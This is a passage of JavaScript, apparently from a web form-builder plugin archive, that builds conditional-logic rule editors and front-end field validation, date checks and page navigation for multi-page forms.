					label_input.style.cssText = "vertical-align: top; width:200px;";		
					label_input.setAttribute("onKeyPress", keypress_function);

				document.getElementById("condition_div"+global_index+"_"+index).insertBefore(label_input,document.getElementById("delete_condition"+global_index+"_"+index));
				document.getElementById("condition_div"+global_index+"_"+index).insertBefore(document.createTextNode(' '),document.getElementById("delete_condition"+global_index+"_"+index));
			}
			else {
				document.getElementById("field_value"+global_index+'_'+index).value="";
				document.getElementById("field_value"+global_index+'_'+index).setAttribute("onKeyPress", keypress_function);
			}
		break;
		
		case "type_own_select":
		case "type_radio":
		case "type_checkbox":
			if(types_array[id]=="type_own_select")
				w_size = params_array[id].split('*:*w_size*:*');
			else
				w_size = params_array[id].split('*:*w_flow*:*');
		
			w_choices = w_size[1].split('*:*w_choices*:*');
			w_choices_array = w_choices[0].split('***');

			var choise_select = document.createElement('select');
				choise_select.setAttribute("id", "field_value"+global_index+'_'+index);
				choise_select.style.cssText = "vertical-align: top; width:200px;";
				if(types_array[id]== "type_checkbox") {
					choise_select.setAttribute('multiple', 'multiple');
					choise_select.setAttribute('class', 'multiple_select');
				}

			for(k=0; k<w_choices_array.length; k++) {
				var choise_option = document.createElement('option');
					choise_option.setAttribute("id", "choise_"+global_index+'_'+k);
					choise_option.setAttribute("value", w_choices_array[k]);
					choise_option.innerHTML = w_choices_array[k];	
					if(w_choices_array[k].indexOf('[') === -1 && w_choices_array[k].indexOf(']') === -1 && w_choices_array[k].indexOf(':') === -1) {
            choise_select.appendChild(choise_option);
          }
			}
			
			document.getElementById("condition_div"+global_index+"_"+index).removeChild(document.getElementById("field_value"+global_index+"_"+index));
			document.getElementById("condition_div"+global_index+"_"+index).insertBefore(choise_select,document.getElementById("delete_condition"+global_index+"_"+index));
			document.getElementById("condition_div"+global_index+"_"+index).insertBefore(document.createTextNode(' '),document.getElementById("delete_condition"+global_index+"_"+index));
		
		break;	
		
		case "type_paypal_select":	
		case "type_paypal_radio":
		case "type_paypal_checkbox":
		case "type_paypal_shipping":
			if(types_array[id]=="type_paypal_select")
				w_size = params_array[id].split('*:*w_size*:*');
			else
				w_size = params_array[id].split('*:*w_flow*:*');
		
			w_choices = w_size[1].split('*:*w_choices*:*');
			w_choices_array = w_choices[0].split('***');

			w_choices_price = w_choices[1].split('*:*w_choices_price*:*');
			w_choices_price_array = w_choices_price[0].split('***');
			
			var choise_select = document.createElement('select');
				choise_select.setAttribute("id", "field_value"+global_index+'_'+index);
				choise_select.style.cssText = "vertical-align: top; width:200px;";
				if(types_array[id]== "type_paypal_checkbox") {
					choise_select.setAttribute('multiple', 'multiple');
					choise_select.setAttribute('class', 'multiple_select');
				}

			for(k=0; k<w_choices_array.length; k++) {
				var choise_option = document.createElement('option');
					choise_option.setAttribute("id", "choise_"+global_index+'_'+k);
					choise_option.setAttribute("value", w_choices_array[k]+'*:*value*:*'+w_choices_price_array[k]);
					choise_option.innerHTML = w_choices_array[k];	
					if(w_choices_array[k].indexOf('[') === -1 && w_choices_array[k].indexOf(']') === -1 && w_choices_array[k].indexOf(':') === -1) {
						choise_select.appendChild(choise_option);
					}
			}
			
			document.getElementById("condition_div"+global_index+"_"+index).removeChild(document.getElementById("field_value"+global_index+"_"+index));
			document.getElementById("condition_div"+global_index+"_"+index).insertBefore(choise_select,document.getElementById("delete_condition"+global_index+"_"+index));
			document.getElementById("condition_div"+global_index+"_"+index).insertBefore(document.createTextNode(' '),document.getElementById("delete_condition"+global_index+"_"+index));
		break;	
		case "type_address":

			coutries=["Afghanistan","Albania",	"Algeria","Andorra","Angola","Antigua and Barbuda","Argentina","Armenia","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bhutan","Bolivia","Bosnia and Herzegovina","Botswana","Brazil","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Canada","Cape Verde","Central African Republic","Chad","Chile","China","Colombi","Comoros","Congo (Brazzaville)","Congo","Costa Rica","Cote d'Ivoire","Croatia","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","East Timor (Timor Timur)","Ecuador","Egypt","El Salvador","Equatorial Guinea","Eritrea","Estonia","Ethiopia","Fiji","Finland","France","Gabon","Gambia, The","Georgia","Germany","Ghana","Greece","Grenada","Guatemala","Guinea","Guinea-Bissau","Guyana","Haiti","Honduras","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Israel","Italy","Jamaica","Japan","Jordan","Kazakhstan","Kenya","Kiribati","Korea, North","Korea, South","Kuwait","Kyrgyzstan","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Marshall Islands","Mauritania","Mauritius","Mexico","Micronesia","Moldova","Monaco","Mongolia","Morocco","Mozambique","Myanmar","Namibia","Nauru","Nepa","Netherlands","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palau","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Qatar","Romania","Russia","Rwanda","Saint Kitts and Nevis","Saint Lucia","Saint Vincent","Samoa","San Marino","Sao Tome and Principe","Saudi Arabia","Senegal","Serbia and Montenegro","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","Solomon Islands","Somalia","South Africa","Spain","Sri Lanka","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Togo","Tonga","Trinidad and Tobago","Tunisia","Turkey","Turkmenistan","Tuvalu","Uganda","Ukraine","United Arab Emirates","United Kingdom","United States","Uruguay","Uzbekistan","Vanuatu","Vatican City","Venezuela","Vietnam","Yemen","Zambia","Zimbabwe"];	
		
		var choise_select = document.createElement('select');
			choise_select.setAttribute("id", "field_value"+global_index+'_'+m);
			choise_select.style.cssText = "vertical-align: top; width:200px;";
				
			for(k=0; k<coutries.length; k++) {
				var choise_option = document.createElement('option');
					choise_select.setAttribute("id", "field_value"+global_index+'_'+index);
					choise_select.style.cssText = "vertical-align: top; width:200px;";
					choise_option.setAttribute("value", coutries[k]);
					choise_option.innerHTML = coutries[k];	
					
				choise_select.appendChild(choise_option);	
			}
			
			document.getElementById("condition_div"+global_index+"_"+index).removeChild(document.getElementById("field_value"+global_index+"_"+index));
			document.getElementById("condition_div"+global_index+"_"+index).insertBefore(choise_select,document.getElementById("delete_condition"+global_index+"_"+index));
			document.getElementById("condition_div"+global_index+"_"+index).insertBefore(document.createTextNode(' '),document.getElementById("delete_condition"+global_index+"_"+index));
			
		break;
	}
}

function add_condition_fields(num, ids1, labels1, types1, params1) {
	ids = ids1.split("@@**@@");
	labels = labels1.split("@@**@@");
	types = types1.split("@@**@@");
	params = params1.split("@@**@@");
	
	for(i=500; i>=0; i--) {
		if(document.getElementById('condition_div'+num+'_'+i))
			break;
	}
	m=i+1;
	
	var condition_div = document.createElement('div');
		condition_div.setAttribute("id", "condition_div"+num+'_'+m);
	
	var labels_select = document.createElement('select');
		labels_select.setAttribute("id", "field_labels"+num+'_'+m);
		labels_select.setAttribute("onchange", "change_choices(options[selectedIndex].id+'_"+m+"','"+ids1+"','"+types1+"','"+params1.replace(/\'/g,"\\'")+"')");
		labels_select.style.cssText="width:300px; vertical-align:top;";

	for(k=0; k<labels.length; k++) {
		if(ids[k]!=document.getElementById('fields'+num).value) {
			var labels_option = document.createElement('option');
				labels_option.setAttribute("id", num+"_"+k);
				labels_option.setAttribute("value", ids[k]);
				labels_option.innerHTML = labels[k];	
				
			labels_select.appendChild(labels_option);	
		}
	}
	
	condition_div.appendChild(labels_select);	
	condition_div.appendChild(document.createTextNode(' '));
	
	var is_select = document.createElement('select');
		is_select.setAttribute("id", "is_select"+num+'_'+m);
		is_select.style.cssText = "width:94px;";

	var	is_option = document.createElement('option');
		is_option.setAttribute("id", "is");
		is_option.setAttribute("value", "==");
		is_option.innerHTML = "is";

	var	is_notoption = document.createElement('option');
		is_notoption.setAttribute("id", "is_not");
		is_notoption.setAttribute("value", "!=");
		is_notoption.innerHTML = "is not";
	
	
	
	var	is_likoption = document.createElement('option');
		is_likoption.setAttribute("id", "like");
		is_likoption.setAttribute("value", "%");
		is_likoption.innerHTML = "like";
		
	var	is_notlikoption = document.createElement('option');
		is_notlikoption.setAttribute("id", "not_like");
		is_notlikoption.setAttribute("value", "!%");
		is_notlikoption.innerHTML = "not like";
		
	var	is_emptyoption = document.createElement('option');
		is_emptyoption.setAttribute("id", "empty");
		is_emptyoption.setAttribute("value", "=");
		is_emptyoption.innerHTML = "empty";
		
	var	is_notemptyoption = document.createElement('option');
		is_notemptyoption.setAttribute("id", "not_empty");
		is_notemptyoption.setAttribute("value", "!");
		is_notemptyoption.innerHTML = "not empty";
		
		
		is_select.appendChild(is_option);	
		is_select.appendChild(is_notoption);
        is_select.appendChild(is_likoption);
        is_select.appendChild(is_notlikoption);
        is_select.appendChild(is_emptyoption);
        is_select.appendChild(is_notemptyoption);		

		condition_div.appendChild(is_select);
		condition_div.appendChild(document.createTextNode(' '));
		
	if(ids[0]!=document.getElementById('fields'+num).value)
		var index_of_field = 0;
	else
		var index_of_field = 1;
	
	switch(types[index_of_field]) {
		case "type_text":
		case "type_password":
		case "type_textarea":
		case "type_name":
		case "type_submitter_mail":
		case "type_phone":
		case "type_number":
		case "type_paypal_price":
		case "type_spinner":
		if(types[index_of_field]=="type_number" || types[index_of_field]=="type_phone")
				var keypress_function = "return check_isnum_space(event)";
			else
				if(types[index_of_field]=="type_paypal_price")
					var keypress_function = "return check_isnum_point(event)";
				else
					var keypress_function = "";
		
		var label_input = document.createElement('input');
			label_input.setAttribute("id", "field_value"+num+'_'+m);
			label_input.setAttribute("type", "text");
			label_input.setAttribute("value", "");	
			label_input.style.cssText = "width:200px;";
			label_input.setAttribute("onKeyPress", keypress_function);
			
		condition_div.appendChild(label_input);
		
		break;
		
		case "type_checkbox":
		case "type_radio":
		case "type_own_select":
			if(types[index_of_field]=="type_own_select")
				w_size = params[index_of_field].split('*:*w_size*:*');
			else
				w_size = params[index_of_field].split('*:*w_flow*:*');
				
			w_choices = w_size[1].split('*:*w_choices*:*');
			w_choices_array = w_choices[0].split('***');
			
			var choise_select = document.createElement('select');
				choise_select.setAttribute("id", "field_value"+num+'_'+m);
				choise_select.style.cssText = "vertical-align: top; width:200px;";
				if(types[index_of_field]== "type_checkbox") {
					choise_select.setAttribute('multiple', 'multiple');
					choise_select.setAttribute('class', 'multiple_select');
				}
					
			for(k=0; k<w_choices_array.length; k++)	 {
				var choise_option = document.createElement('option');
					choise_option.setAttribute("id", "choise_"+num+'_'+k);
					choise_option.setAttribute("value", w_choices_array[k]);
					choise_option.innerHTML = w_choices_array[k];	
					
				if(w_choices_array[k].indexOf('[') === -1 && w_choices_array[k].indexOf(']') === -1 && w_choices_array[k].indexOf(':') === -1) {
					choise_select.appendChild(choise_option);
				}
			}
			condition_div.appendChild(choise_select);	
			
		break;
		
		case "type_paypal_select":
		case "type_paypal_checkbox":
		case "type_paypal_radio":
		case "type_paypal_shipping":
			if(types[index_of_field]=="type_paypal_select")
				w_size = params[index_of_field].split('*:*w_size*:*');
			else
				w_size = params[index_of_field].split('*:*w_flow*:*');
				
			w_choices = w_size[1].split('*:*w_choices*:*');
			w_choices_array = w_choices[0].split('***');
			
			w_choices_price = w_choices[1].split('*:*w_choices_price*:*');
			w_choices_price_array = w_choices_price[0].split('***');
			
			var choise_select = document.createElement('select');
				choise_select.setAttribute("id", "field_value"+num+'_'+m);
				choise_select.style.cssText = "vertical-align: top; width:200px;";
				if(types[index_of_field]== "type_paypal_checkbox") {
					choise_select.setAttribute('multiple', 'multiple');
					choise_select.setAttribute('class', 'multiple_select');
				}
					
			for(k=0; k<w_choices_array.length; k++)	 {
				var choise_option = document.createElement('option');
					choise_option.setAttribute("id", "choise_"+num+'_'+k);
					choise_option.setAttribute("value", w_choices_array[k]+'*:*value*:*'+w_choices_price_array[k]);
					choise_option.innerHTML = w_choices_array[k];	
					
				if(w_choices_array[k].indexOf('[') === -1 && w_choices_array[k].indexOf(']') === -1 && w_choices_array[k].indexOf(':') === -1) {
					choise_select.appendChild(choise_option);
				}
			}
			condition_div.appendChild(choise_select);	
		break;
		
		case "type_address":
			coutries=["Afghanistan","Albania",	"Algeria","Andorra","Angola","Antigua and Barbuda","Argentina","Armenia","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bhutan","Bolivia","Bosnia and Herzegovina","Botswana","Brazil","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Canada","Cape Verde","Central African Republic","Chad","Chile","China","Colombi","Comoros","Congo (Brazzaville)","Congo","Costa Rica","Cote d'Ivoire","Croatia","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","East Timor (Timor Timur)","Ecuador","Egypt","El Salvador","Equatorial Guinea","Eritrea","Estonia","Ethiopia","Fiji","Finland","France","Gabon","Gambia, The","Georgia","Germany","Ghana","Greece","Grenada","Guatemala","Guinea","Guinea-Bissau","Guyana","Haiti","Honduras","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Israel","Italy","Jamaica","Japan","Jordan","Kazakhstan","Kenya","Kiribati","Korea, North","Korea, South","Kuwait","Kyrgyzstan","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Marshall Islands","Mauritania","Mauritius","Mexico","Micronesia","Moldova","Monaco","Mongolia","Morocco","Mozambique","Myanmar","Namibia","Nauru","Nepa","Netherlands","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palau","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Qatar","Romania","Russia","Rwanda","Saint Kitts and Nevis","Saint Lucia","Saint Vincent","Samoa","San Marino","Sao Tome and Principe","Saudi Arabia","Senegal","Serbia and Montenegro","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","Solomon Islands","Somalia","South Africa","Spain","Sri Lanka","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Togo","Tonga","Trinidad and Tobago","Tunisia","Turkey","Turkmenistan","Tuvalu","Uganda","Ukraine","United Arab Emirates","United Kingdom","United States","Uruguay","Uzbekistan","Vanuatu","Vatican City","Venezuela","Vietnam","Yemen","Zambia","Zimbabwe"];	
		
		var choise_select = document.createElement('select');
			choise_select.setAttribute("id", "field_value"+num+'_'+m);
			choise_select.style.cssText = "width:200px;";
				
			for(k=0; k<coutries.length; k++) {
				var choise_option = document.createElement('option');
					choise_option.setAttribute("id", "choise_"+num+'_'+k);
					choise_option.setAttribute("value", coutries[k]);
					choise_option.innerHTML = coutries[k];	
					
				choise_select.appendChild(choise_option);	
			}
			condition_div.appendChild(choise_select);	
		break;
	}
	condition_div.appendChild(document.createTextNode(' '));
	
	var	img=document.createElement('img');
		img.setAttribute('src',plugin_url + '/images/delete.png');
		img.setAttribute('id','delete_condition'+num+'_'+m);
		img.setAttribute('onClick','delete_field_condition("'+num+'_'+m+'")');
		img.style.cssText = "vertical-align: middle";

	condition_div.appendChild(img);
	document.getElementById('condition'+num).appendChild(condition_div);
}

function add_condition(ids1, labels1, types1, params1, all_ids, all_labels) {
	for(i=500; i>=0; i--) {
		if(document.getElementById('condition'+i))
			break;
	}
	
	num=i+1;

	ids = all_ids.split("@@**@@");
	labels = all_labels.split("@@**@@");

	var condition_div = document.createElement('div');
		condition_div.setAttribute("id", "condition"+num);
		condition_div.setAttribute("class", "fm-condition");
	
	var conditional_fields_div = document.createElement('div');
		conditional_fields_div.setAttribute("id", "conditional_fileds"+num);
	
	var show_hide_select = document.createElement('select');
		show_hide_select.setAttribute("id", "show_hide"+num);
		show_hide_select.setAttribute("name", "show_hide"+num);
		show_hide_select.style.cssText="width:80px;";

	var show_option = document.createElement('option');
		show_option.setAttribute("value", "1");
		show_option.innerHTML = "show";

	var hide_option = document.createElement('option');
		hide_option.setAttribute("value", "0");
		hide_option.innerHTML = "hide";	
	
	show_hide_select.appendChild(show_option);
	show_hide_select.appendChild(hide_option);
	
	var fields_select = document.createElement('select');
		fields_select.setAttribute("id", "fields"+num);
		fields_select.setAttribute("name", "fields"+num);
		fields_select.style.cssText="width:303px;";
		
	for(k=0; k<labels.length; k++) {
		var fields_option = document.createElement('option');
			fields_option.setAttribute("value", ids[k]);
			fields_option.innerHTML = labels[k];
			
		fields_select.appendChild(fields_option);
	}

	var span = document.createElement('span');
		span.innerHTML = 'if';	
				
	var all_any_select = document.createElement('select');
		all_any_select.setAttribute("id", "all_any"+num);
		all_any_select.setAttribute("name", "all_any"+num);
		all_any_select.style.cssText="width:60px;";

	var all_option = document.createElement('option');
		all_option.setAttribute("value", "and");
		all_option.innerHTML = "all";

	var any_option = document.createElement('option');
		any_option.setAttribute("value", "or");
		any_option.innerHTML = "any";	
		
	all_any_select.appendChild(all_option);
	all_any_select.appendChild(any_option);

	var span1 = document.createElement('span');
		span1.innerHTML = 'of the following match:';	


	var add_img = document.createElement('img');
		add_img.setAttribute('src',plugin_url + '/images/add.png');
		add_img.setAttribute('onClick','add_condition_fields("'+num+'", "'+ids1+'", "'+labels1.replace(/\'/g,"\\'").replace(/\"/g,"&quot;")+'", "'+types1.replace(/\'/g,"\\'").replace(/\"/g,"&quot;")+'", "'+params1.replace(/\'/g,"\\'").replace(/\"/g,"&quot;")+'")');
		add_img.style.cssText = "cursor: pointer; vertical-align: middle;";
	
	var delete_img = document.createElement('img');
		delete_img.setAttribute('src',plugin_url + '/images/page_delete.png');
		delete_img.setAttribute('onClick','delete_condition("'+num+'")');
		delete_img.style.cssText = "cursor: pointer; vertical-align: middle;";
	
	conditional_fields_div.appendChild(show_hide_select);	
	conditional_fields_div.appendChild(document.createTextNode(' '));
	conditional_fields_div.appendChild(fields_select);
	conditional_fields_div.appendChild(document.createTextNode(' '));
	conditional_fields_div.appendChild(span);	
	conditional_fields_div.appendChild(document.createTextNode(' '));
	conditional_fields_div.appendChild(all_any_select);	
	conditional_fields_div.appendChild(document.createTextNode(' '));
	conditional_fields_div.appendChild(span1);	
	conditional_fields_div.appendChild(document.createTextNode(' '));
	conditional_fields_div.appendChild(add_img);	
	conditional_fields_div.appendChild(document.createTextNode(' '));
	conditional_fields_div.appendChild(delete_img);	

	condition_div.appendChild(conditional_fields_div);	
	document.getElementById('conditions_fieldset').appendChild(condition_div);	
}

function delete_condition(num) {
	document.getElementById('conditions_fieldset').removeChild(document.getElementById('condition'+num));	
}

function acces_level(length) {
	var value='';
	for(i=0; i<=parseInt(length); i++) {
    if (document.getElementById('user_'+i).checked) {
      value=value+document.getElementById('user_'+i).value+',';			
    }	
  }
	document.getElementById('user_id_wd').value=value;
}

function check_isnum_space(e) {
	var chCode1 = e.which || e.keyCode;	
	if (chCode1 ==32) {
		return true;
  }
  if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57)) {
		return false;
  }
	return true;
}

function check_isnum_point(e) {
  var chCode1 = e.which || e.keyCode;	
	if (chCode1 ==46) {
		return true;
	}
	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57)) {
    return false;
  }
	return true;
}
js/main.js000060400000065215152434416630006457 0ustar00F=2;
var c;
var a=new Array();
function show_other_input(num, form_id)
{
		for(k=0;k<50;k++)
			if(	document.getElementById(num+"_element"+form_id+k)) 
				if(	document.getElementById(num+"_element"+form_id+k).getAttribute('other')) 
					if(	document.getElementById(num+"_element"+form_id+k).getAttribute('other')==1)
					{
						var element_other=document.getElementById(num+"_element"+form_id+k);
						break;
					}



	var parent=element_other.parentNode;

	var br = document.createElement('br');
		br.setAttribute("id", num+"_other_br"+form_id);
		
	var el_other = document.createElement('input');
		el_other.setAttribute("id", num+"_other_input"+form_id);
		el_other.setAttribute("name", num+"_other_input"+form_id);
		el_other.setAttribute("type", "text");
		el_other.setAttribute("class", "other_input");
		el_other.setAttribute("style", "margin-left:25px");
	parent.appendChild(br);
	parent.appendChild(el_other);

}

function set_sel_am_pm(select_)
{
	if(select_.options[0].selected) 
	{
		select_.options[0].setAttribute("selected", "selected");
		select_.options[1].removeAttribute("selected");
	}
	else
	{
		select_.options[1].setAttribute("selected", "selected");
		select_.options[0].removeAttribute("selected");
	}

}

function check_isnum(e) {
  var chCode1 = e.which || e.keyCode;
  if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
    return false;
	return true;
}

function check_isnum_or_minus(e) {
  var chCode1 = e.which || e.keyCode;
	if (chCode1 != 45 ) {
    if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
      return false;
	}
	return true;
}

function captcha_refresh(id, genid) {
	srcArr=document.getElementById(id+genid).src.split("&r=");
	document.getElementById(id+genid).src=srcArr[0]+'&r='+Math.floor(Math.random()*100);
	document.getElementById(id+"_input"+genid).value='';
	document.getElementById(id+genid).style.display="block";
}

function set_checked(id,j,form_id)
{
	checking=document.getElementById(id+"_element"+form_id+j);
	if(checking.getAttribute('other'))
		if(checking.getAttribute('other')==1)
			if(!checking.checked)
			{					
				if(document.getElementById(id+"_other_input"+form_id))
				{
					document.getElementById(id+"_other_input"+form_id).parentNode.removeChild(document.getElementById(id+"_other_br"+form_id));
					document.getElementById(id+"_other_input"+form_id).parentNode.removeChild(document.getElementById(id+"_other_input"+form_id));
				}
				return false;					
			}
	return true;
}

function set_select (){}

function set_default(id, j, form_id){	
if(document.getElementById(id+"_other_input"+form_id))
	{
		document.getElementById(id+"_other_input"+form_id).parentNode.removeChild(document.getElementById(id+"_other_br"+form_id));
		document.getElementById(id+"_other_input"+form_id).parentNode.removeChild(document.getElementById(id+"_other_input"+form_id));
	}
}

function add_0(id)
{
	input=document.getElementById(id);
	if(input.value.length==1)
	{
		input.value='0'+input.value;
		input.setAttribute("value", input.value);
	}
}

function change_hour(ev, id,hour_interval)
{
	if(check_hour(ev, id,hour_interval))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_minute(ev, id)
{
	if(check_minute(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_second(ev, id)
{
	if(check_second(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function check_hour(e, id, hour_interval)
{
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	hour=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	hour=parseFloat(hour);
	if((hour<0) || (hour>hour_interval))
        	return false;
	return true;
} 

function check_minute(e, id)
{	
		
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	minute=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	minute=parseFloat(minute);
	if((minute<0) || (minute>59))
        	return false;
	return true;
} 

function check_second(e, id)
{	
		
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	second=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	second=parseFloat(second);
	if((second<0) || (second>59))
        	return false;
	return true;
} 

function change_day(ev, id)
{
	if(check_day(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_month(ev, id)
{
	if(check_month(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_year(id)
{
	year=document.getElementById(id).value;
	
	from=parseFloat(document.getElementById(id).getAttribute('from'));
	to=parseFloat(document.getElementById(id).getAttribute('to'));
	
	year=parseFloat(year);
	
	if((year>=from) && (year<=to))
		document.getElementById(id).setAttribute("value", year);
	else
		document.getElementById(id).setAttribute("value", '');
}

function check_day(e, id)
{	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	day=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	if(day.length>2)
        	return false;
			
	if(day=='00')
        	return false;
			
	day=parseFloat(day);
	if((day<0) || (day>31))
        	return false;
	return true;
} 

function check_month(e, id)
{	
		
	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	month=""+document.getElementById(id).value+String.fromCharCode(chCode1);
	
	if(month.length>2)
        	return false;
			
	if(month=='00')
        	return false;
			
	month=parseFloat(month);
	if((month<0) || (month>12))
        	return false;
	return true;
} 

function check_year1(e, id)
{	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;

	year=""+document.getElementById(id).value+String.fromCharCode(chCode1);
	
	to=parseFloat(document.getElementById(id).getAttribute('to'));
	
	year=parseFloat(year);
	
	if(year>to)
        	return false;
	return true;
} 

function check_year2(id, str)
{
	year=document.getElementById(id).value;
	
	from=parseFloat(document.getElementById(id).getAttribute('from'));
	
	year=parseFloat(year);
	
	if(year<from)
	{
		document.getElementById(id).value='';
	}
}	
	

function delete_value(id)
{
	if( window.getComputedStyle ) 
		{
		  ofontStyle = window.getComputedStyle(document.getElementById(id),null).fontStyle;
		} else if( document.getElementById(id).currentStyle ) {
		  ofontStyle = document.getElementById(id).currentStyle.fontStyle;
		}

	if(ofontStyle=="italic")

	{

		document.getElementById(id).value="";

		destroyChildren(document.getElementById(id));
		document.getElementById(id).setAttribute("class", "input_active");
		document.getElementById(id).className='input_active';
	}

}

function return_value(id)
{

	input=document.getElementById(id);

	if(input.value=="")

	{
			input.value=input.title;

		input.setAttribute("value", input.title);
		input.className='input_deactive';
		input.setAttribute("class", 'input_deactive');

	}
}

function change_value(id)
{

	input=document.getElementById(id);
	 
	tag=input.tagName;
	if(tag=="TEXTAREA")
	{

	input.innerHTML=input.value;
	}
	else

	input.setAttribute("value", input.value);



}

function change_input_value(first_value, id)
{	
	input=document.getElementById(id);

	input.title=first_value;
	
if( window.getComputedStyle ) 
{
  ofontStyle = window.getComputedStyle(input,null).fontStyle;
} else if( input.currentStyle ) {
  ofontStyle = input.currentStyle.fontStyle;
}
	if(ofontStyle=="italic")

	{	

		input.value=first_value;

		input.setAttribute("value", first_value);

	}
}

function change_file_value(destination, id)
{	
	input=document.getElementById(id);
	input.setAttribute("value", destination);
}

function change_label(id, label)
{
	document.getElementById(id).innerHTML=label;
	document.getElementById(id).value=label;
}

function change_in_value(id, label)
{
	document.getElementById(id).setAttribute("value", label);
}

function destroyChildren(node)
{
  while (node.firstChild)
      node.removeChild(node.firstChild);
}

function generate_page_nav(id, form_id, form_view_count, form_view_max)
{
form_view=id;
page_nav=document.getElementById(form_id+'page_nav'+id);
destroyChildren(page_nav);
form_view_elemet=document.getElementById(form_id+'form_view'+id);

display_none_form_views_all(form_id);

generate_page_bar(id, form_id, form_view_count, form_view_max);

form_view_elemet.parentNode.style.display="";

if(form_view_elemet.parentNode.previousSibling && form_view_elemet.parentNode.previousSibling.previousSibling)
{
	if(form_view_elemet.parentNode.previousSibling.tagName=="TABLE")
		table=form_view_elemet.parentNode.previousSibling;
	else
		if(form_view_elemet.parentNode.previousSibling.previousSibling.tagName=="TABLE")
			table=form_view_elemet.parentNode.previousSibling.previousSibling;
		else
			table="none";
			
	if(table!="none")
	{
		if(!table.firstChild.tagName)
			table.removeChild(table.firstChild);


		previous_title	= form_view_elemet.getAttribute('previous_title');
		previous_type	= form_view_elemet.getAttribute('previous_type');
		previous_class	= form_view_elemet.getAttribute('previous_class');
		previous_checkable	= form_view_elemet.getAttribute('previous_checkable');
	
		next_or_previous="previous";

		previous=make_pagebreak_button(next_or_previous, previous_title, previous_type, previous_class, previous_checkable, id, form_id, form_view_count, form_view_max);
		var td = document.createElement("td");
			td.setAttribute("valign", "middle");
			td.setAttribute("align", "left");
		
		td.appendChild(previous);
		page_nav.appendChild(td);
	}
}


		var td = document.createElement("td");
			td.setAttribute("id", "page_numbers"+form_view);
			td.setAttribute("width", "100%");
			td.setAttribute("valign", "middle");
			td.setAttribute("align", "center");
if(document.getElementById(form_id+'pages').getAttribute('show_numbers')=="true")
{
		k=0;
		for(j=1; j<=form_view_max; j++)
		{
			if(document.getElementById(form_id+'form_view'+j))
			{
				k++;		
				if(j==form_view)
					page_number=k;
			}
		}
		
		var cur = document.createElement('span');
			cur.setAttribute("class", "page_numbers");
			cur.innerHTML=page_number+'/'+k;
		
		td.appendChild(cur);

}
		page_nav.appendChild(td);



not_next=false;
if(form_view_elemet.parentNode.nextSibling)
{
	if(form_view_elemet.parentNode.nextSibling.tagName=="TABLE")
		table=form_view_elemet.parentNode.nextSibling;
	else
		if(form_view_elemet.parentNode.nextSibling.nextSibling)
		{
			if(form_view_elemet.parentNode.nextSibling.nextSibling.tagName=="TABLE")
				table=form_view_elemet.parentNode.nextSibling.nextSibling;
			else
				table="none";
		}
			else
				table="none";
			
	if(table!="none")
	{
		next_title		=form_view_elemet.getAttribute('next_title');
		next_type		=form_view_elemet.getAttribute('next_type');
		next_class		=form_view_elemet.getAttribute('next_class');
		next_checkable	=form_view_elemet.getAttribute('next_checkable');
	
		next_or_previous="next";
	
		next=make_pagebreak_button(next_or_previous, next_title, next_type, next_class, next_checkable, id, form_id, form_view_count, form_view_max);
		var td = document.createElement("td");
			td.setAttribute("valign", "middle");
			td.setAttribute("align", "right");
		
		td.appendChild(next);
		page_nav.appendChild(td);
	}
	else
	{
		not_next=true;
	}
}
else
{
	not_next=true;
}

	for(x=0; x<parseInt(document.getElementById('counter'+form_id).value); x++)
		if(document.getElementById(x+'_type'+form_id))
			if(document.getElementById(x+'_type'+form_id).value=="type_map")
